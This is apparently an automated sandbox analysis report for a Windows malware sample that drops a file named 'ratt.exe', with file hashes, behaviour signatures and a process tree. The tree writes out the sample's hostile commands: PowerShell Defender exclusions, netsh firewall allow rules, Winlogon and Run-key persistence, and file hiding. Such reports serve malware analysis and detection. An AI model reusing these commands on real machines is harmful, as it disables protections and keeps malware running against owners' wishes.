Analysis
-
max time kernel
54s -
max time network
137s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
-
submitted
03/08/2023, 08:55
General
-
Target
f1bdda8eedb0ee0772c8d13bdf67702362c860e3a6aa349661b9c032a073364e.exe
-
Size
1.4MB
-
MD5
ff26825995ab99c9a338e8f1c7c2639e
-
SHA1
b36cae5467214b04a8065037d15b400fe87ca7c6
-
SHA256
f1bdda8eedb0ee0772c8d13bdf67702362c860e3a6aa349661b9c032a073364e
-
SHA512
aeb42decfc3aa5bf4c40fb41c04648122b44c202257869e1b04197c8a315c3eb38098d072b371fa2eed9a2795d42cb54c38ca18d9145f25cb3f5e1c7d5b60804
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
UPX packed file 7 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f1bdda8eedb0ee0772c8d13bdf67702362c860e3a6aa349661b9c032a073364e.exe"C:\Users\Admin\AppData\Local\Temp\f1bdda8eedb0ee0772c8d13bdf67702362c860e3a6aa349661b9c032a073364e.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 86⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\Music\rot.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 146⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
417.9MB
MD50b360022cc55165695381c1dd7973627
SHA1224d58383eb56b1cb757891587e8550fd21510fe
SHA25671f0faf4742cfa97c0612c58e9301935c55d3c5452a99c5a0081f55782c05c14
SHA512c9ab42e25f4663decdb449aeaa3c763a70459f983880b89e8337b6794b300f82008880ffcf5016c130a1533ef687344ed956486378832b72ce4c4791b4e2e79f
-
Filesize
306.5MB
MD54519bd535b1943c29c2eb8b466aab55c
SHA174ad328273fe3a9591ba08a3908f255603050c31
SHA256f5a3c3ae3d16166a7bc2219874ee21325e7d5c111757adafbabeae5f780c2797
SHA512b53d89d5e74a6651e3c3bee68f195c009bd4b9957fb989bbc8771f107b14294ca57cc0cafa63481f5a25535f51344bf4d7490926ab13e7813b6ec32909085335
-
Filesize
1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
Filesize
1KB
MD59e104e9aa0cfdec0753de24cbe3f587b
SHA1f63b8d0b29c65e518be6a9412e7499c9de11be78
SHA25659a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f
SHA5128253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b
-
Filesize
12KB
MD5b3cfe0be5b3caed49e4b8115c8a4cbd5
SHA17d9a443ad9c379b207c1315cc41729a0a0b2b214
SHA2569a6a894ae41ad23fd12b3ee8a9578cdd9809c33388ed298ebe87e4efebad04b4
SHA5129f3f7ce1c393f62cc676afc3869213b6d6f5f8028d69e636ae22e1472f48bffb22460aabb4fa05055fc641887cac33cdb2d718358cc5be73f361a1727a03bdda
-
Filesize
12KB
MD5182e07bedc29424ed0e55f63b2aa56d0
SHA169260992e96d1d627dfc05a17bc830927ad86572
SHA256dc59bf32a72841bb835d0ee2e6b1b63e59a39e164a8f697fa20858b10737bef1
SHA512863b382d19de39380dee53c21e9cf21c6840797a6188eb7d456e136896e9436ffa15d3e9e3adfbea46ee3ceac658b8f35aad06337390f437fce5194f2f9b476b
-
Filesize
12KB
MD5f63006f159f0bf705c8edd7b32c7c9d3
SHA17b324ed79626ec90ff3031996abf8a90c4694dfc
SHA2567b6f817dbb639c2cf128a9e0d68d287a4596d3b219fc4cf00133c3a438bcea75
SHA5129222fee43c6485e8d53e050bcd1424bb03804bfced1b44404855d2055debbaeba8f70bb4afa74af3f0adb64ab92a2984f17114c7b7531d501c4b17fa005e4bbc
-
Filesize
12KB
MD58dd2094d3f4df06fcfae5f4bb43cb9cc
SHA1dba9da4026aa9c62d132389a352e0f2fc9615a56
SHA256c45218bb97b331e91b15ed941b122ca11bd8642cdd7fe6b49582aa3c62be1aff
SHA5126ccae2a36b61609f1b46e73b6eadc43e19c51f97320e4152977b4e9251a6f9534acc0a2464a4f71acd7d21e9a0b0deae6bc53d171f1a69d6904c8d271d07e6fe
-
Filesize
12KB
MD5939c713c49a28378e93086712b63e60f
SHA19c750ec751591846e2b6d98ae5348e5669112d11
SHA256942e3643051fcbbf213dfb99a64b26e66fa8f3ac24f079e8fde4884da3d4c1f5
SHA512d8e1b9579e26ad84d3865af90f5e9a2fd7fc8c862b15ce786298a5f249ad714004095bad1fa3f63946d55c4f2e91ad1e6f074c3d845c54528a36e3494ea0bb05
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
SHA51201ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
693KB
MD57de6fdf3629c73bf0c29a96fa23ae055
SHA1dcb37f6d43977601c6460b17387a89b9e4c0609a
SHA256069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
SHA512d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8
-
Filesize
1KB
MD57ea1fec84d76294d9256ae3dca7676b2
SHA11e335451d1cbb6951bc77bf75430f4d983491342
SHA2569a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
SHA512ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317
-
Filesize
745.1MB
MD5be788bb3680cf3809d9678ee6f7ba321
SHA1499f01d5f654f83e172004dcc03f99abdd251734
SHA25603a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b
SHA51283c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e
-
Filesize
63.7MB
MD5d5b878f8db9fca1f1504604167b53774
SHA131a51b7e3d02bd114caf053637f69360c0e42e08
SHA25697cd5d257d9d807b19df327f82c02b0d6346bcaa030d4698764ef1f4cfe9ce15
SHA512a875846f01d76a6af764e645b59d6ac901ec6a5174c7da3a26924b9d268c83075172673164081ae6f1bb84a7e91e3447256f5689243551b08a5628e6cbce00bc
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
660KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
5.0MB
-
Filesize
136KB
-
Filesize
300KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
592KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
204KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
112KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.9MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
472KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
1.7MB
-
Filesize
6.9MB
-
Filesize
624KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
200KB
-
Filesize
200KB
-
Filesize
904KB